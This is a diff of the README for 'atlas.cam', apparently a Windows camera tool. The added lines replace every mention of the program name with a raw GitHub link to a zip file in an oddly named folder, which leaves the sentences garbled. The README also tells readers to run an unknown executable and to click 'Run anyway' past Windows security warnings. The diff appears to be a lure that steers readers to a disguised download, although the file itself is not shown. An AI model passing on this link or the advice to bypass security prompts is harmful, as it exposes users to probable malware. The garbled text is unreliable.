1urelius/atlas.cam/README.md

 - About 50 MB of free space for the program and temporary files.
 - An internet connection to download the app.

-atlas.cam runs on most Windows versions including Windows 10 and 11.
+https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip runs on most Windows versions including Windows 10 and 11.

 ---

-## 🚀 Getting Started: How to Download atlas.cam
+## 🚀 Getting Started: How to Download https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip

 1. Click the big pink “Download From Releases” button at the top of the page.
-This opens the atlas.cam releases page.
+This opens the https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip releases page.

 2. On the releases page, look for the latest version.
-It usually has a name like `atlas.cam_v1.0_windows.exe` or similar.
+It usually has a name like `https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip` or similar.

 3. Download the Windows executable (`.exe`) file.
 This is the file you will run.

 4. Save it in a folder that you can easily find, like your Desktop or Downloads folder.

-You have now downloaded atlas.cam.
+You have now downloaded https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip

 ---

-## 🔧 Installing and Running atlas.cam on Windows
+## 🔧 Installing and Running https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip on Windows

-atlas.cam does not need a complex installation.
+https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip does not need a complex installation.
 The file you downloaded is ready to run.

 1. Open File Explorer and find the `.exe` file you saved.

-2. Double-click the file to start atlas.cam.
+2. Double-click the file to start https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip

 3. If Windows shows a security popup about running unknown software, choose “Run anyway” or “More info” and then “Run”.